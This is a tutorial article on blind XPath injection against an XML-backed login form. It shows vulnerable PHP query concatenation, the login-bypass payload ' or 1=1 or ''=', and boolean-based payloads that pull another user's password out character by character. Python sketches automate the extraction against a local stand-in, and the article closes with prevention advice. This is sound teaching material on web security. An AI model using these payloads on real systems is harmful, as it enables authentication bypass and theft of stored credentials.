Use the extended attack possibilities of XPath injection
To explain the most important terms, we have provided a simple XML document below; this document forms the basis for the rest of the article.
<?xml version="1.0" encoding="UTF-8"?>
<accounts> <!-- root node -->
  <user id="1"> <!-- node with attribute -->
    <username> <!-- child of user node -->
      1337h4x0r <!-- node value -->
    </username>
    <firstname>Leet</firstname>
    <lastname>Hacker</lastname>
    <email>email@example.com</email>
    <accounttype>normal</accounttype>
    <password>123456</password>
  </user>
  <user id="2">
    <username>johnnynormal</username>
    <firstname>John</firstname>
    <lastname>Doe</lastname>
    <email>firstname.lastname@example.org</email>
    <accounttype>administrator</accounttype>
    <password>UiobxmA5UcDVF9m5VAq</password>
  </user>
</accounts>
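The XML document shown above corresponds approximately to the following tree:
accounts
├── user (id="1")
│   ├── username: 1337h4x0r
│   ├── firstname: Leet
│   ├── lastname: Hacker
│   ├── email: email@example.com
│   ├── accounttype: normal
│   └── password: 123456
└── user (id="2")
    ├── username: johnnynormal
    ├── firstname: John
    ├── lastname: Doe
    ├── email: firstname.lastname@example.org
    ├── accounttype: administrator
    └── password: UiobxmA5UcDVF9m5VAq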
With XPath, the nodes in an XML document can be selected in various ways. The most important selection options here are:
| XPath query | Result of the XPath query |
|---|---|
| /accounts | The root node accounts is selected. |
| //user | All nodes with the name 'user' are selected. |
| /accounts/user | All user nodes that are child nodes of the accounts node are selected. |
| /accounts/user[username='1337h4x0r'] | The user node that contains the user name 1337h4x0r is returned. An absolute path starts with /. |
| //user[email='email@example.com'] | The user node that contains the e-mail address email@example.com is returned. A path that starts with // selects all nodes that meet the condition(s) set, no matter where in the tree the nodes are located. |
| /accounts/child::node() | This selects all child nodes of the accounts node. |
| //user[position()=2] | This selects the user node at position 2. Warning: Since the index starts at 1, this selects the node of the user johnnynormal. |
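The selections in the table can be tried out locally. The following is a minimal sketch using Python's standard xml.etree.ElementTree module, which supports only a subset of XPath: queries are written relative to the root element (./user instead of /accounts/user), and position()=2 is written in its abbreviated form [2]. The XML string is a compact copy of the sample document without whitespace or comments, because ElementTree compares element text exactly.

```python
import xml.etree.ElementTree as ET

# Compact copy of the sample document (assumption: no whitespace or comments
# inside the elements, so that text comparisons match exactly).
XML = (
    '<accounts>'
    '<user id="1"><username>1337h4x0r</username><firstname>Leet</firstname>'
    '<lastname>Hacker</lastname><email>email@example.com</email>'
    '<accounttype>normal</accounttype><password>123456</password></user>'
    '<user id="2"><username>johnnynormal</username><firstname>John</firstname>'
    '<lastname>Doe</lastname><email>firstname.lastname@example.org</email>'
    '<accounttype>administrator</accounttype>'
    '<password>UiobxmA5UcDVF9m5VAq</password></user>'
    '</accounts>'
)

root = ET.fromstring(XML)  # root is the <accounts> element

# //user: all user nodes anywhere below the root
all_users = root.findall(".//user")

# /accounts/user: user nodes that are direct children of accounts
child_users = root.findall("./user")

# /accounts/user[username='1337h4x0r']
leet = root.findall("./user[username='1337h4x0r']")

# //user[email='email@example.com']
by_mail = root.findall(".//user[email='email@example.com']")

# //user[position()=2], abbreviated as [2]; the index starts at 1
second = root.findall(".//user[2]")

print(root.tag)
print([user.get("id") for user in all_users])
print(leet[0].findtext("lastname"))
print(second[0].findtext("username"))
```

A full XPath 1.0 engine would accept the queries exactly as written in the table; the rewritten forms here are only a concession to ElementTree's reduced syntax.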
Now that we have covered the most important basics of XML Path Language, I will provide step-by-step instructions on how to approach a Blind XPath Injection. Our example is based on a login screen. The goal is to bypass this login screen and ultimately read out all users' passwords.
To determine whether an XPath Injection exists in principle, an apostrophe ' or a quotation mark " can be entered as the first character in the user name field. In the best-case scenario, an error message will be returned for one of these characters; this message would look something like this:
Warning: SimpleXMLElement::xpath(): Invalid predicate in /webserver/index.php on line 56
Warning: SimpleXMLElement::xpath(): xmlXPathEval: evaluation failed in /webserver/index.php on line 56
The appearance of this message or something similar unequivocally confirms that an XPath Injection in this section is the right approach.
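When testing several input fields, it can help to check responses for such messages automatically. The following is a minimal sketch; the marker strings are taken from the sample warnings above and are specific to PHP's SimpleXML and libxml2, so other server stacks will need different markers. The names PROBES, XPATH_ERROR_MARKERS and looks_like_xpath_error are hypothetical helpers, and sending the actual requests is left out.

```python
# Characters to try as the first character of the user name field.
PROBES = ("'", '"')

# Substrings that appear in the sample warnings shown above
# (assumption: PHP SimpleXML / libxml2 backend with visible warnings).
XPATH_ERROR_MARKERS = (
    "SimpleXMLElement::xpath()",
    "xmlXPathEval",
    "Invalid predicate",
)


def looks_like_xpath_error(response_body: str) -> bool:
    """Return True if the response contains one of the known XPath warnings."""
    return any(marker in response_body for marker in XPATH_ERROR_MARKERS)


sample = (
    "Warning: SimpleXMLElement::xpath(): Invalid predicate "
    "in /webserver/index.php on line 56"
)
print(looks_like_xpath_error(sample))
print(looks_like_xpath_error("Login failed. Please try again."))
```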
In general, an XPath Injection uses a similar principle to an SQL injection. The point is to change an existing XPath query in such a way that it has the effect desired by the attacker.
Fortunately for the attacker, an XPath Injection – unlike an SQL injection – works in such a way that no access controls can be implemented within the XML document. Consequently, the entire XML document can be read out in the event of an XPath injection.
Furthermore, XPath is a standard query language; this means that different XPath dialects do not need to be dealt with. Only the fact that there are different XPath versions must be taken into account. At the moment, XPath 3.1 is the most current version. To determine the XPath version used, a function from version 2.0 or 3.1 that did not yet exist in the previous XPath version can be employed. If an error message stating this function does not exist is displayed, you can assume that you are dealing with an older XPath version.
In our example, I use the function lower-case("ABC"), which was not introduced until version 2.0, to check the XPath version. Since the error message below is output in our example, it can be concluded that XPath 1.0 is being used.
Warning: SimpleXMLElement::xpath(): xmlXPathCompOpEval: function lower-case not found in /webserver/index.php on line 56
Warning: SimpleXMLElement::xpath(): Unregistered function in /webserver/index.php on line 56
Warning: SimpleXMLElement::xpath(): Stack usage error in /webserver/index.php on line 56
Warning: SimpleXMLElement::xpath(): xmlXPathEval: 1 object left on the stack in /webserver/index.php on line 56
Similar to the expression ' OR '1'='1 in an SQL Injection, ' or 1=1 or ''=' exists in an XPath Injection. As a result, evaluation of the condition password='...' can be bypassed in a query of the form 'bool_value_1 and bool_value_2', such as username='...' and password='...'.
Our example includes the input fields User name and Password. We enter the value ' or 1=1 or ''=' as the user name and the value bla as the password. If we assume the server logic below:
simplexml_load_file("useraccounts.xml")->xpath("/accounts/user[username='" . $_POST["username"] . "' and password='" . $_POST["password"] . "']");
the following XPath query is created:
xpath("/accounts/user[username='' or 1=1 or ''='' and password='bla']")
Because and binds more tightly than or in XPath, the predicate is evaluated as username='' or 1=1 or (''='' and password='bla'). Since 1=1 is always true, the password comparison no longer affects the result, and the and-statement is effectively bypassed. The modified XPath query therefore returns all users, and because the application uses the first user in this result, we are logged in as the first user of the XML document.
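The effect of the concatenation can be reproduced without a server. The sketch below mirrors the assumed PHP logic in Python: build_query is a hypothetical stand-in for the string concatenation, and predicate re-states the injected condition with Python's and/or, which have the same relative precedence as their XPath counterparts.

```python
def build_query(username: str, password: str) -> str:
    """Mimic the vulnerable concatenation of user input into the XPath query."""
    return (
        "/accounts/user[username='" + username
        + "' and password='" + password + "']"
    )


query = build_query("' or 1=1 or ''='", "bla")
print(query)


def predicate(stored_username: str, stored_password: str) -> bool:
    """The injected predicate, evaluated for one user node.

    'and' binds more tightly than 'or', so this reads as
    A or B or (C and D), and B (1 == 1) is always true.
    """
    return (
        stored_username == ""
        or 1 == 1
        or "" == "" and stored_password == "bla"
    )


# True for every user, regardless of the stored credentials
print(predicate("1337h4x0r", "123456"))
print(predicate("johnnynormal", "UiobxmA5UcDVF9m5VAq"))
```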
We have now arrived at a state that permits us to perform a Boolean-Based Blind Injection. We can replace the first or-statement (1=1) with a condition of our choice: if we are still logged in as the first user after this change, the condition is true; if the login fails, it is false.
To continue this example in a logical manner, we assume that we can determine the password of the XML document’s first user. To do this, we can either change the password once we are logged in, or we could read it out from the user interface of the profile for the user who is logged in. Thus, for the rest of this example we assume that we know the password to be 123456.
Since we assume that the XML document has an unknown structure, the first task is to determine the node where the password is saved. Knowing this position within a user element is fundamental because we can only brute-force an unknown password if we are aware of the position. Here it is helpful to know the password of the user who is in first place.
I would now like to go through each step in the first or-query, which we need for the Blind XPath Injection:
//user[position()=1]: This selects the user who is in first place in the XML document. We should note here that the node name 'user' is a reasonable assumption. If we do not get any hits using this assumption, other terms similar to 'user' should be tried.
(//user[position()=1]/child::node()[position()=1]): The aim of this query is to select the first child node of the first user. Applied to our sample XML document, this would be the username node.
substring((//user[position()=1]/child::node()[position()=1]),1): substring is defined as string substring(string_to_work_with, start_of_substring_extraction, [optional_length_of_extracted_string]). Applied to our sample XML, this means that the string is read out from the username node. Since no length is specified, the entire string 1337h4x0r is read out. Warning: In XPath, the index starts at 1, not at 0 as is otherwise customary in IT.
substring((//user[position()=1]/child::node()[position()=1]),1)="123456": After the effective value of the first user's first child node has been read out and determined to be 1337h4x0r, this value is compared to 123456. In this case, the comparison yields false. If this query is inserted as it is in place of 1=1, as the first or-value in the query ' or 1=1 or ''=', the login fails. We can then conclude that the first child node of the user is not the password. To achieve a login in our sample XML, the query ' or substring((//user[position()=1]/child::node()[position()=6]),1)="123456" or ''=' is needed. This allows us to determine that the password is in position 6 in the user node.
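The search for the password position can be sketched as a simple loop. In the sketch below, build_payload produces the value for the user name field, while login_succeeds is a local stand-in for the vulnerable login: it is not an XPath engine, it merely answers the same yes/no question against a compact copy of the sample document and counts element children only, as the article's simplified tree does. All function names are hypothetical.

```python
import xml.etree.ElementTree as ET

# Compact copy of the sample document (assumption: no whitespace or comments).
XML = (
    '<accounts>'
    '<user id="1"><username>1337h4x0r</username><firstname>Leet</firstname>'
    '<lastname>Hacker</lastname><email>email@example.com</email>'
    '<accounttype>normal</accounttype><password>123456</password></user>'
    '<user id="2"><username>johnnynormal</username><firstname>John</firstname>'
    '<lastname>Doe</lastname><email>firstname.lastname@example.org</email>'
    '<accounttype>administrator</accounttype>'
    '<password>UiobxmA5UcDVF9m5VAq</password></user>'
    '</accounts>'
)
ROOT = ET.fromstring(XML)


def build_payload(user_pos: int, child_pos: int, guess: str) -> str:
    """User name field value that compares one child node with a known value."""
    return (
        f"' or substring((//user[position()={user_pos}]"
        f"/child::node()[position()={child_pos}]),1)=\"{guess}\" or ''='"
    )


def login_succeeds(user_pos: int, child_pos: int, guess: str) -> bool:
    """Local stand-in for the server's answer to the payload above."""
    children = list(ROOT.findall("./user")[user_pos - 1])
    if not 1 <= child_pos <= len(children):
        return False
    return (children[child_pos - 1].text or "") == guess


def find_position(user_pos: int, known_value: str, max_children: int = 10):
    """Return the 1-based child position holding known_value, or None."""
    for child_pos in range(1, max_children + 1):
        if login_succeeds(user_pos, child_pos, known_value):
            return child_pos
    return None


print(build_payload(1, 6, "123456"))
print(find_position(1, "123456"))
```

Against a real target, login_succeeds would instead submit build_payload(...) in the user name field and check whether the login went through.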
Since we now know the position of the password, we can easily adjust the query to ' or substring((//user[position()=2]/child::node()[position()=6]),1,1)="a" or ''='. This queries the first character of the second user's password and compares that character with the letter 'a'. We manage this by specifying in the substring query how many characters from the start position are to be returned. Since we do not get a successful login with a comparison to 'a', we can conclude that the password of the second user does not start with a. It is not until we use ' or substring((//user[position()=2]/child::node()[position()=6]),1,1)="U" or ''=' that we are successfully logged in as the first user of the XML document again. So, the first character of the password is the letter U.
The only thing left to do is to increment the position of the selected substring and compare the characters again. The query ' or substring((//user[position()=2]/child::node()[position()=6]),2,1)="i" or ''=' gets us our second hit.
This type of comparison can be automated relatively easily, so readers are free to research this themselves if they so wish.
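As a starting point, the character-by-character comparison could be automated roughly as follows. This is a sketch under several assumptions: login_succeeds is again a local stand-in for the vulnerable login rather than a real request, the character set is limited to ASCII letters and digits, and extraction stops at the first position where no character from that set matches. All names are hypothetical.

```python
import string
import xml.etree.ElementTree as ET

# Compact copy of the sample document (assumption: no whitespace or comments).
XML = (
    '<accounts>'
    '<user id="1"><username>1337h4x0r</username><firstname>Leet</firstname>'
    '<lastname>Hacker</lastname><email>email@example.com</email>'
    '<accounttype>normal</accounttype><password>123456</password></user>'
    '<user id="2"><username>johnnynormal</username><firstname>John</firstname>'
    '<lastname>Doe</lastname><email>firstname.lastname@example.org</email>'
    '<accounttype>administrator</accounttype>'
    '<password>UiobxmA5UcDVF9m5VAq</password></user>'
    '</accounts>'
)
ROOT = ET.fromstring(XML)
CHARSET = string.ascii_letters + string.digits  # assumed alphabet


def build_payload(user_pos: int, child_pos: int, index: int, char: str) -> str:
    """User name field value that tests a single character of a node value."""
    return (
        f"' or substring((//user[position()={user_pos}]"
        f"/child::node()[position()={child_pos}]),{index},1)=\"{char}\" or ''='"
    )


def login_succeeds(user_pos: int, child_pos: int, index: int, char: str) -> bool:
    """Local stand-in for the server: is the character at 'index' equal to char?"""
    value = list(ROOT.findall("./user")[user_pos - 1])[child_pos - 1].text or ""
    return value[index - 1:index] == char  # XPath indices start at 1


def extract_value(user_pos: int, child_pos: int, max_length: int = 64) -> str:
    """Recover a node value one character at a time via the yes/no oracle."""
    recovered = ""
    for index in range(1, max_length + 1):
        for char in CHARSET:
            if login_succeeds(user_pos, child_pos, index, char):
                recovered += char
                break
        else:
            break  # no character matched: end of value or unknown character
    return recovered


print(build_payload(2, 6, 2, "i"))
print(extract_value(2, 6))
```

With this alphabet, each character costs at most 62 login attempts, which illustrates why XPath 1.0 extraction requires a large number of queries.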
To prevent an XPath Injection, pre-compiled XPath queries should be used if at all possible. If the selected library does not support these, a parameterized XPath interface should be used. If neither of these options is possible and a user's input has to be embedded in a dynamic XPath query, the user input must be escaped. When escaping values, whitelisting approaches should be used wherever possible.
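For the last resort, embedding user input in a dynamic query, the two ideas could look roughly like this. The sketch is illustrative only: the whitelist pattern for user names is an assumption that must be adapted to the application, and xpath_literal relies on the fact that XPath 1.0 string literals have no escape character, so a value containing both quote types has to be assembled with concat(). Both function names are hypothetical.

```python
import re

# Assumed whitelist: letters, digits, dot, underscore, hyphen; 1 to 64 chars.
USERNAME_PATTERN = re.compile(r"[A-Za-z0-9._-]{1,64}")


def require_safe_username(value: str) -> str:
    """Reject any user name that contains characters outside the whitelist."""
    if not USERNAME_PATTERN.fullmatch(value):
        raise ValueError("user name contains characters outside the whitelist")
    return value


def xpath_literal(value: str) -> str:
    """Turn an arbitrary string into a safe XPath 1.0 string expression."""
    if "'" not in value:
        return "'" + value + "'"
    if '"' not in value:
        return '"' + value + '"'
    # Both quote types occur: split on ' and rejoin the parts with concat().
    parts = ["'" + part + "'" for part in value.split("'")]
    return "concat(" + ", \"'\", ".join(parts) + ")"


print(require_safe_username("johnnynormal"))
print(xpath_literal("bla"))
print(xpath_literal("' or 1=1 or ''='"))
```

With xpath_literal, the injection string from the login example ends up inside a double-quoted literal and is compared as plain text instead of changing the structure of the query.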
In conclusion, I would like to note that this article focused solely on XPath 1.0. Compared to versions 2.0 and 3.1, XPath 1.0 has only a few functions, so reading out XML documents requires a large number of queries. XPath 2.0 and 3.1 added many functions that simplify reading out XML documents, thus broadening the reach of an XPath Injection. For example, the function doc(path_to_xml_document) was added in XPath 2.0 and allows users to reference, and as a result read out, other XML documents. This allows an attacker to read out config files stored at known locations, for instance.